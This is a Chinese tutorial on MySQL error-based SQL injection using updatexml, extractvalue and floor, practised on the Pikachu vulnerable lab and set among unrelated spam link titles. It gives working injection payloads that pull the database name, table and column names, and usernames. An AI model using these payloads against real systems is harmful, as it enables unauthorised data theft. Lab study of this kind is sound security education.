当前位置: 首页 > news >正文

一些网站只能在微信打开怎么做的网站怎么添加广告

一些网站只能在微信打开怎么做的,网站怎么添加广告,融媒体建设网站怎么搞,google官方入口常用的用来报错的函数 updatexml() : 函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。 extractvalue(): 函数也是MYSQL对XML文档数据进行查询的XPATH函数。 floor(): MYSQL中用来取整的函数。 思路#xff1a; 在MySQL中使用一些指定的函数来制造报错 在MySQL中使用一些指定的函数来制造报错从而从报错信息中获取设定的信息。select / insert / update / delete 都可以使用报错来获取信息。 前提条件是后台没有屏蔽数据库报错信息在语法发生错误时会输出到前端。 updatexml() Updatexm()函数作用: 改变(查找并替换) XML文档中符合条件的节点的值。 语法: UPDATEXML (xml document, XPathstring, new_value) 第一个参数: fiedname是String格式为表中的字段名。 第二个参数: XPathstring (Xpath格式的字符串)。 第三个参数: new. valueString格式替换查找到的符合条件的 Xpath定位必须是有效的否则会发生错误。  pikachu - 字符型注入(GET) 实验 aa and updatexml(1,concat(0x7e,database()),0)#// 0x7e 是 ~ 的十六进制 ,避免报错信息被吃掉 如果没有concat 而是aa and updatexml(1,database(),0)#    这样报错信息会少一部分没法完全展示 获取到了数据库名称 pikachu我们可以把 database() 替换成任意我们想要获得的东西。 得到数据库名称后根据数据库名查询表名 aa and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema pikachu)),0)# // 中间的select 语句要用() 括号括起来//查询报多于一行 aa and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema pikachu limit 1)),0)# 使用上述语句查到第一张表名继续使用limit 1,1   或 limit 2,1 查询下去可以把所有的表名查询出来 或者burp suite  参数化查询把所有表查出来。 得到表名后可以根据表名查询字段名 aa and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name users limit 0,1)),0)# 得到所有列名。可以根据列名获取数据 aa and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)# extractvalue() extractvalue()函数作用:从目标XML中返回包含所查询值的字符串。 语法: ExtractValue(xm| _document, xpath. string) 第一个参数: XML document是String格式为XML文档对象的名称,文中为Doc 第二个参数: XPath_ string (Xpath格式的字符串) Xpath定位必须是有效的,否则会发生错误。 打开字符型注入输入payload。 aa and extractvalue(0,concat(0x7e,version()))# 效果差不多理解以此类推即可。 floor() 原因floor()报错注入的原因是 groupby 在向临时表插入数据时由于rand()多次计算导致插入临时表时主键重复从而报错又因为报错前 concat()中的SQL语句或函数被执行所以该语句报错且被抛出的主键是SQL语句或数执行后的结果。 floor()函数对传入的值进行向下取整操作并返回结果如floor(1.999),则返回1 rand()函数返回随机数 rand(x)函数x在这里代表参数当rand()函数有了参数后生成的就是伪随机数什么意思呢比如你使用rand(0)产生的第一个随机数产生的随机数相同也就是当rand(x)这个参数x已知的时候我们就能知道 在字符型中输入payload得到版本号。 aa and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#
http://www.hkea.cn/news/14353305/

相关文章:

  • 网站建设合同注意点郑州威盟网站建设公司怎么样
  • 河北住房和建设厅官方网站建设工程施工合同条例
  • 辽源网站seo城乡建设杂志官方网站
  • 东莞做网站seo优化龙岩网站建设设计服务
  • 怎么做qq网站电子商务网站建设感想
  • 静态网站开发课程相关新闻南宁伯才网络
  • 怎么给网站做spm特产网站建设
  • 免费制作照片的网站菏泽做网站设计
  • seo网站推广企业wordpress 4.3
  • 江门网站建设方案外包互联网营销是做什么的
  • 比wordpress更好的网站程序青海省教育厅门户网站学籍查询
  • 做公司网站需要营业执照吗郴州新网招聘信息
  • 有什么好网站做浏览器主页wordpress 支付查看
  • 做非法网站怎么规避电商网站 开发成本
  • 济南济南网站建设网站建设网站怎么做切换中英文
  • wordpress安卓版教程刷排名seo软件
  • 昆明网站建设首选互维成都网上注册公司流程
  • 做兼职的网站策划书网站 组成
  • 做网站电话沧州安装iis8 添加网站
  • 集美区网站建设百度推广还要求做网站
  • 开网站卖东西需要什么条件龙网网络推广软件
  • 网站风格分析怎么写温州企业网站建设服务
  • 建设一个电子商务网站的基本步骤长沙公司网站
  • 帮别人做网站的公司是外包吗dux2.0支持Wordpress
  • 在线做头像网站有哪些kingcms 暂未创建网站首页
  • 响应式网站模板htmlwordpress 分类信息
  • 如何查看一个网站的浏览量门户网站开发人员招聘信息
  • 局域网中做网站自己做资金盘网站
  • 手机端视频网站模板下载有哪些官网做的比较好的网站
  • 网站怎么企业备案信息查询公司装修完就让搬进去